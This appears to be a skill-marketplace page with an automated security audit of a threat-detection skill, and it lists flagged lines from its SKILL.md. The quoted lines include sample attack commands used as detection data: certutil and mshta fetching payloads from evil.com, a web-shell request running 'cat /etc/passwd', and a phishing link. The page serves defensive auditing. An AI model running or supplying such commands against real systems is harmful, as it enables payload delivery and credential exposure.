Skip to main content

detection

Provides comprehensive security detection capabilities for identifying threats across various vectors, enabling effective threat hunting and rule management.

Install this skill

or
75/100

Security score

The detection skill was audited on Feb 9, 2026 and we found 7 security issues across 3 threat categories, including 1 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

medium line 415

Template literal with variable interpolation in command context

SourceSKILL.md
415```python
high line 468

Access to /etc/passwd

SourceSKILL.md
468{'url': '/images/logo.php', 'params': {'c': 'cat /etc/passwd'}, 'response_size': 2000},
low line 299

External URL reference

SourceSKILL.md
299'command_line': 'certutil.exe -urlcache -split -f http://evil.com/payload.exe',
low line 304

External URL reference

SourceSKILL.md
304'command_line': 'mshta.exe http://evil.com/script.hta',
low line 492

External URL reference

SourceSKILL.md
492'body': 'Click here to reset your password: http://evil.com/reset',
low line 493

External URL reference

SourceSKILL.md
493'links': ['http://evil.com/reset'],
low line 641

External URL reference

SourceSKILL.md
641- [MITRE ATT&CK](https://attack.mitre.org/)
Scanned on Feb 9, 2026
View Security Dashboard
Installation guide →